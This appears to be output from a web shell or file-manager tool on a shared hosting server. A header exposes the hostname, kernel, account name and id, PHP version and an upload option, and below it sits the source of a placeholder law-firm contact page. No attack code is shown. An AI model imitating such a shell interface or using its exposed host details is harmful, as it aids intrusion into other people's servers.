HEX
Server: Apache
System: Linux p3plzcpnl489526.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: vmasmheia229 (9244908)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/vmasmheia229/domains/defml.net/html/contact.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Contact Us | Skywalker &amp; Son: Minneapolis Family Lawyers</title>
<link rel="stylesheet" href="styles/reset.css" type="text/css" />
<link rel="stylesheet" href="styles/960.css" type="text/css" />
<link href="styles/style.css" rel="stylesheet" type="text/css" />
</head>
<body class="contact">
<div class="container">
      <div class="shadow">
            <div class="container_12">
                  <?php include("includes/header.php"); ?>
                  <div class="grid_12 alpha omega">
                        <div class="grid_8 alpha">
                              <div class="padding-left"> <img src="images/home-image.jpg" alt="Name of the Law Firm & Tagline" /> </div>
                        </div>
                        <div class="grid_4 omega">
                              <?php include("includes/call_to_action.php"); ?>
                        </div>
                  </div>
                  <div class="double-line margin-top margin-bottom"></div>
                  <div class="grid_12 alpha omega">
                        <div class="grid_6 alpha">
                              <div class="padding no-padding-top">
                                    <?php include("includes/contact_form.php"); ?>
                              </div>
                        </div>
                        <div class="grid_6 omega">
                              <div class="padding no-padding-top">
                                    <h2 class="no-margin">Phone Number</h2>
                                    <p>(773) 123-4567</p>
                                    <h2>Address &amp; Location</h2>
                                    <iframe height="300" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://www.google.com/maps?f=q&amp;source=s_q&amp;hl=en&amp;geocode=&amp;q=minneapolis,+MN&amp;sll=41.880864,-87.65318&amp;sspn=0.082308,0.128403&amp;ie=UTF8&amp;ll=44.984835,-93.260107&amp;spn=0.01955,0.032101&amp;z=14&amp;output=embed&amp;iwloc=near"></iframe>
                                    <p><a href="http://www.google.com/maps?f=q&amp;source=embed&amp;hl=en&amp;geocode=&amp;q=minneapolis,+MN&amp;sll=41.880864,-87.65318&amp;sspn=0.082308,0.128403&amp;ie=UTF8&amp;ll=44.984835,-93.260107&amp;spn=0.01955,0.032101&amp;z=14&amp;iwloc=near">View Larger Map</a></p>
                                    <address>
                                    123 Main St. Suite 300<br />
                                    Minneapolis, MN 55407
                                    </address>
                              </div>
                        </div>
                  </div>
                  <?php include("includes/footer.php"); ?>
            </div>
      </div>
</div>
</body>
</html>